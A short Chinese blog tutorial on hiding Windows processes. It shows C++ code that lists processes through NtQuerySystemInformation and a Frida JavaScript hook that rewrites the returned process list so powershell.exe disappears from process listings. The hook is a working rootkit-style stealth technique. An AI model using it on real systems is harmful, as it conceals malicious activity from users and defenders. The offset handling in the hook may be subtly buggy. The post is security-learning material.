frida隐藏进程小试

攻防相关
字数统计: 371   |   阅读时长≈ 1 分钟

Hook NtQuerySystemInformation

NtQuerySystemInformation

1
2
3
4
5
6
NTSTATUS NTAPI NtQuerySystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);

该函数位于ntdll.dll中,第一个参数指定要查询的类型,若指定SystemProcessInformation(0x5)时,则会得到系统中所有进程的信息,第二个参数则返回一个SYSTEM_PROCESS_INFORMATION结构数组

SYSTEM_PROCESS_INFORMATION.NextEntryOffset是数组中下一个成员的相对本成员的偏移值(每个成员的大小不固定),若此结构为0,则是最后一个节点,例如以下获取进程列表名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
typedef NTSTATUS ( NTAPI *NT_QUERY_SYSTEM_INFOMATION)(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
);


int main(void)
{
    SYSTEM_PROCESS_INFORMATION *spi = new SYSTEM_PROCESS_INFORMATION[0x1000];
    ULONG leng;
    NT_QUERY_SYSTEM_INFOMATION nt_query_system_infomation = (NT_QUERY_SYSTEM_INFOMATION)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");
    nt_query_system_infomation(SystemProcessInformation, spi, sizeof(SYSTEM_PROCESS_INFORMATION) * 0x1000, &leng);

    auto ptr = spi;
    while(ptr->NextEntryOffset != 0) {
        if(ptr->ImageName.Length) {
            wprintf(L"%s\n", ptr->ImageName.Buffer);
        }
        ptr = (SYSTEM_PROCESS_INFORMATION *)((BYTE *)ptr + ptr->NextEntryOffset);
    }

    system("pause");
    return 0;
}

隐藏进程也就是修改SYSTEM_PROCESS_INFORMATION.NextEntryOffset来跳过需要被隐藏的进程节点

frida js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
var query_info_func = Module.findExportByName('ntdll.dll', 'NtQuerySystemInformation');
Interceptor.attach(query_info_func, {
    onEnter : function(args) {
        if(args[0] == 5) {
            this.work = true;
            this.si = args[1];
        }
    },
    onLeave : function(retval) {
        if(this.work) {
            var si_ptr = this.si;
            var next_offset = Memory.readU32(si_ptr);
            var pre_offset = next_offset;
            while(next_offset != 0) {
                pre_offset = next_offset;
                next_offset = Memory.readU32(si_ptr);
                // 偏移值64,针对win10 x64
                var image_name = Memory.readUtf16String(Memory.readPointer(si_ptr.add(64)));
                // console.log(image_name);
                // 隐藏powershell
                if(image_name == "powershell.exe") {
                    var next_node = si_ptr.add(next_offset);
                    var pre_node = si_ptr.sub(pre_offset);
                    Memory.writeU32(pre_node, next_offset + pre_offset);
                }

                si_ptr = si_ptr.add(next_offset);
            }
        }
    }
});

参考

https://www.fuzzysecurity.com/tutorials/29.html

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021 lzeroyuee
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~

支付宝
微信